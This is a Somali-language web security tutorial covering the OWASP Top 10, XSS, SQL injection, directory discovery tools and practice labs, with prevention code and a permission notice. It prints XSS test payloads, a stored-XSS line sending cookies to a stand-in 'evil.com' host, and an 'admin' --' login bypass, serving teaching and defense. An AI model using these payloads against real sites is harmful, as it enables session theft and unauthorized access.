Casharka Ugu Dambeeya — Web Security!
Casharkaan wuxuu xididayaa koorsada oo dhan. Waxaad baranaysaa sida loo aqoonsado nuglaanshaha website-ka: XSS, SQL Injection, iyo Directory Discovery — meelaha ugu badan ee hackers-ka ay soo gelaan.
📌 Waxaad baranaysaa: OWASP Top 10, XSS (Cross-Site Scripting), SQL Injection hordhac, directory discovery (Gobuster/Dirb), iyo sida website-ka loo ammaan geliyo.
⚖️ Ogeysiis Muhiim ah: Ku isticmaal aqoontaan si ansax ah — nidaamahaaga ama beerooyinka tijaabada ah (DVWA, HackTheBox, TryHackMe). Wixii ku saabsan website-yada kale, u baahan tahay fasax.
1. OWASP Top 10 — Nuglaanshaha Ugu Badan
OWASP (Open Web Application Security Project) waa hay'ad aan faa'iido doon ahayn oo daabacda liiska nuglaanshaha website-yada ugu badan. Liiska 2021-ka:
- A01: Broken Access Control — Isticmaaluhu wuu geli karaa meelaha aan loo ogolayn
- A02: Cryptographic Failures — Xogta la siriyay si khaldan ama aan la siriyayn
- A03: Injection (SQL, NoSQL, etc.) — Input-ka isticmaalaha ayaa loo xukuma nidaamka
- A04: Insecure Design — Naqshadaynta nidaamka oo khaldan
- A05: Security Misconfiguration — Qaabeynta nidaamka oo khaldan
- A06: Vulnerable Components — Libraries / frameworks hore oo nugul
- A07: Auth Failures — Galitaanka nidaamka oo loogu joogsaday si khaldan
- A08: Software & Data Integrity — Updates ma la xaqiijin karo?
- A09: Logging Failures — Diiwaanka aan la kaydin si fiican
- A10: Server-Side Request Forgery (SSRF) — Server-ka ayaa weerar lagu isticmaalaa
2. XSS — Cross-Site Scripting
XSS waa nuglaansha ugu badan ee websites-ka. Waxay dhacda marka website-ku oggolaado in koodh xun (JavaScript) lagu daboolo page-ka oo la socodsiiyo browser-ka isticmaaluhu.
Noocyada XSS
# 1. Reflected XSS — koodhka waxaa loogu celinaa marka la baadho
# URL: http://vulnerable.com/search?q=<script>alert('XSS')</script>
# Hadduu website-ka direct-ka ku daabaco, wuu socodsiin doonaa
# 2. Stored XSS — koodhka waxaa la kaydiyaa database-ka
# Tusaale: Comment field oo lagu geliyo:
# <script>document.location='http://evil.com/steal?cookie='+document.cookie</script>
# Hadda isticmaalaha kasta ee aragtaa comment-ka, cookie-gaagii wuu leexsan doonaa
# 3. DOM-based XSS — JavaScript-ka browser-ka ayaa bedelaya DOM-ka
Sidee loo Xaqiijin karaa XSS
# Tijaabi input fields-ka website-ka
# Ku geli:
<script>alert('XSS Test')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
# Hadduu saas u shaqeeyo — website-ku waa nugul yahay XSS
Sida XSS loo xukumo (Prevention)
# 1. HTML Encoding — bedel xarfaha khaas
# < → < > → > " → "
# 2. Content Security Policy (CSP) Header
Content-Security-Policy: default-src 'self'; script-src 'self'
# 3. HTTPOnly Cookie — ka hortag in JavaScript cookie-ga galo
Set-Cookie: session=abc123; HttpOnly; Secure
# 4. Framework-ka isticmaal (React, Angular) — waxay si toos ah u xukumaan
3. SQL Injection — Hordhac
SQL Injection waxay dhacda marka input-ka isticmaalaha si toos ah loogu daray SQL query-da la qoraysan la'aanteed. Tani waxay oggolaanaysaa in hacker-ku jagadeeyo query-da.
Tusaale SQL Injection
# Website-ka code-kiisa oo nugul (Python / PHP)
# query = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"
# Isticmaaluhu hadduu galiyo:
# Username: admin' --
# Password: wax kasta
# Query-da noqonaysaa:
# SELECT * FROM users WHERE username='admin' -- ' AND password='wax kasta'
# Sababtoo ah -- waa comment SQL-ka dhexdiisa, password-kii waa la ilowday!
# Hacker-ku wuxuu galayaa adoo aan password garanayno
Sida SQL Injection loo xukumo
# 1. Parameterized Queries (Ugu muhiim)
# Python (sqlite3):
cursor.execute("SELECT * FROM users WHERE username=? AND password=?", (username, password))
# PHP (PDO):
$stmt = $pdo->prepare("SELECT * FROM users WHERE username=:username");
$stmt->execute(['username' => $username]);
# 2. Input Validation
# Ku xidh nooca iyo dhererka
# 3. ORM isticmaal
# SQLAlchemy, Django ORM, iwm — waxay si toos ah u xukumaan
4. Directory Discovery — Hel Meelaha Qarsoon
Directory Discovery waa hab lagu raadinayo directories iyo files qarsoon ee website-ka ee aan si cad loo muujeynin. Xirfadlayaasha pen testing-ka badanaa waxay helaan admin pages, backup files, iyo config files si hawl ah.
Gobuster — Tool-ka Ugu Dhakhsaha badan
# Ku rakib
sudo apt install gobuster
# Basic Directory Discovery
gobuster dir -u http://localhost -w /usr/share/wordlists/dirb/common.txt
# Dheeraad ah
gobuster dir \
-u http://target.com \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,txt,bak \
-t 50 \
-o natiijo.txt
# Sharaxaad flags-ka:
# -u = URL bartilmaameedka
# -w = Wordlist (liiska kelmadaha lagu tijaabinayo)
# -x = Fileypes (extensions) la raadinayo
# -t = Threads (meli samaynta)
# -o = Natiijada keydi faylka
Dirb — Alternativ-ka Fudud
# Dirb — fudud laakiin wuu shaqeeyaa
dirb http://localhost
dirb http://localhost /usr/share/dirb/wordlists/common.txt
Feroxbuster — Recursive Scan
# Feroxbuster wuu gali karaa galayaasha hoostooda sidoo kale
feroxbuster --url http://localhost --wordlist /usr/share/wordlists/dirb/common.txt
5. Beerooyinka Tijaabada ah (Practice Labs)
Ku tijaabi aqoontaada adigoo isticmaalaya beerooyinka ansaxa ah:
Bilaash ah — Online
- 🟢 TryHackMe (tryhackme.com) — Bilow-friendly, waxaa laga heli karaa rooms bilaash ah
- 🔵 HackTheBox (hackthebox.com) — Heer sare, laakiin fursado badan
- 🟡 PortSwigger Web Security Academy — Web Security oo bilaash ah si gaar ah
- 🟠 PicoCTF — Xirfadlayaasha billowayaasha ah
Locally (VMs)
- 💻 DVWA (Damn Vulnerable Web Application) — Website nugul oo loogu talagalay barasho
- 💻 VulnHub — VMs bilaash ah oo la baari karo
- 💻 Metasploitable — Linux VM oo nugul, Metasploit lagu tijaabinayo
# Dejis DVWA Docker-ka
docker run --rm -it -p 80:80 vulnerables/web-dvwa
# Browser-ka fur: http://localhost
# Username: admin
# Password: password
6. Web Security Checklist — Hubi Website-kaaga
# Qaabeynta Aasaasiga (HTTP Headers)
curl -I https://example.com
# Hubi headers muhiimka:
# X-Frame-Options: DENY / SAMEORIGIN (Clickjacking xukun)
# X-XSS-Protection: 1; mode=block (XSS filter)
# Content-Security-Policy (CSP)
# Strict-Transport-Security (HSTS)
# X-Content-Type-Options: nosniff (MIME sniffing)
# Online tools si bilaash ah:
# securityheaders.com — Header check
# ssllabs.com/ssltest — SSL/TLS check
# observatory.mozilla.org — Security check
🚀 Tallaabada Xiga: Bilow TryHackMe ama HackTheBox, qaado exam-ka eJPT ama CompTIA Security+, oo raadi shaqo cybersecurity ah. Fadal Store ayaa sii daraynaysa casharo dheeraad ah — raadi warkooda!